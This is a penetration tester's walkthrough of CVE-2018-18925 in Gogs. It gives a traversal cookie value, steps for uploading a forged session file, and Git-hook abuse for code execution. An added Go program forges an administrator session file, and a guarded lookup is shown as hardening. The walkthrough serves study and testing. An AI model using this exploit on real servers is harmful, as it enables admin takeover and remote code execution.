CVE-2018-18925

Exploitation of CVE-2018-18925, a remote code execution vulnerability in the self-hosted Git service Gogs.

Gogs is built on the Macaron framework, whose session handling works much like PHP's: the session identifier carried in the cookie is mapped to a file on the file system. When the web server receives a request with a session identifier (as a cookie), it looks up the corresponding file on disk and loads the session data from it.

The vulnerability is a plain directory traversal in that lookup: the session identifier is used to build the file path without any sanitisation. For example, setting the i_like_gogits cookie to ../../../../../../etc/passwd makes the server try to load /etc/passwd as a session file, and the resulting error from the server confirms that the path is reached.

Exploitation:

To turn the traversal into a session bypass, we need a way to place a file of our own on the server, then use the path to that file as our session id. A crafted session file that identifies us as the administrator can be generated with https://github.com/RyouYoo/CVE-2018-18925/blob/main/main.go.

Usage:

go run main.go

Uploading the malicious file and logging in as administrator

When you use the “Upload file” functionality, Gogs creates a local copy of the repository and writes the uploaded files to /data/gogs/data/tmp/local-repo/[REPO_ID]/[FILENAME] (this local copy only exists once the upload feature has been used). You therefore need an account that can upload to a repository, which any registered user can do on a repository they own.

Here [FILENAME] is the name of the file you uploaded and [REPO_ID] is the numeric repository identifier, which can be read from the repository's Fork link (in the original screenshot the repository id is 5).

By default, sessions are stored in /data/gogs/data/sessions/, so the relative path ../tmp/local-repo/[REPO_ID]/[FILENAME] reaches the uploaded file from the session directory. Set that path as the value of the i_like_gogits cookie and you should be logged in as administrator. The uploaded file must be the raw generated session file, byte for byte, since the server decodes it exactly as it would one of its own.
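The following Go program is an added example, not the page's code and not the linked main.go; it shows what the crafted file has to contain and why the cookie value above works. It assumes what Gogs stores for a signed-in user (an int64 "uid" and a string "uname"), that the administrator is user id 1 with the name admin (the first account created on a Gogs instance), that the session file provider joins the session root, the first two characters of the id and the id itself with path.Join, and it uses forged_session as the file name. The guarded lookupSession at the end is hardening written for this example, not the project's own fix.

```go
package main

import (
	"bytes"
	"encoding/gob"
	"fmt"
	"os"
	"path"
	"regexp"
	"strings"
)

// Gogs keys the signed-in user by "uid" (int64) and "uname" (string).
// The first account created on an instance is the administrator, so
// uid 1 is assumed here; adjust if the target's admin id differs.
const adminUID int64 = 1

// forgeSession builds the gob-encoded body of a Macaron file-provider
// session naming the given user as signed in. The provider encodes a
// map[interface{}]interface{} on its write side; this is a re-implementation
// for the example, not the referenced main.go.
func forgeSession(uid int64, uname string) ([]byte, error) {
	data := map[interface{}]interface{}{
		"uid":   uid,
		"uname": uname,
	}
	var buf bytes.Buffer
	if err := gob.NewEncoder(&buf).Encode(data); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

// decodeSession mirrors the provider's read side so the forged bytes can be
// checked to round-trip into the values Gogs looks at.
func decodeSession(raw []byte) (map[interface{}]interface{}, error) {
	var out map[interface{}]interface{}
	err := gob.NewDecoder(bytes.NewReader(raw)).Decode(&out)
	return out, err
}

// sessionPath models the vulnerable lookup: session root, the first two
// characters of the id as sub-directories, then the id itself, joined with
// no validation (assumed layout). With a "../" prefix both sub-directories
// become "." and path.Join collapses the result outside the session root.
func sessionPath(root, sid string) string {
	if len(sid) < 2 {
		return path.Join(root, sid)
	}
	return path.Join(root, string(sid[0]), string(sid[1]), sid)
}

var validSID = regexp.MustCompile(`^[A-Za-z0-9]+$`)

// lookupSession is the guarded form: reject anything that is not a plain
// alphanumeric id before it reaches path.Join, and refuse the result if it
// still resolves outside the session root.
func lookupSession(root, sid string) (string, error) {
	if !validSID.MatchString(sid) {
		return "", fmt.Errorf("invalid session id %q", sid)
	}
	p := sessionPath(root, sid)
	if !strings.HasPrefix(p, path.Clean(root)+"/") {
		return "", fmt.Errorf("session path %q escapes %q", p, root)
	}
	return p, nil
}

func main() {
	raw, err := forgeSession(adminUID, "admin")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	// This is the file to upload; its name becomes [FILENAME] in the cookie.
	if err := os.WriteFile("forged_session", raw, 0o600); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	root := "/data/gogs/data/sessions"
	sid := "../tmp/local-repo/5/forged_session" // cookie value, repo id 5 as on the page
	fmt.Println("vulnerable lookup resolves to:", sessionPath(root, sid))
	if _, err := lookupSession(root, sid); err != nil {
		fmt.Println("guarded lookup rejects it:", err)
	}
}
```

Running it writes forged_session to the current directory and prints /data/gogs/data/tmp/local-repo/5/forged_session for the vulnerable resolution, which is exactly the upload location from the previous step; the guarded version rejects the same id before any path is built.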

Remote Code Execution:

To get RCE, use the Git hooks feature of a repository to run a shell script. Editing Git hooks is restricted to administrators in Gogs, which is why the session bypass is needed first.

In the pre-receive hook, insert the commands you want executed:

Then trigger the hook by pushing to the repository, either with git or through the create-file function of the web interface.

Aymen EL Haski (Jakom)

Web Penetration Tester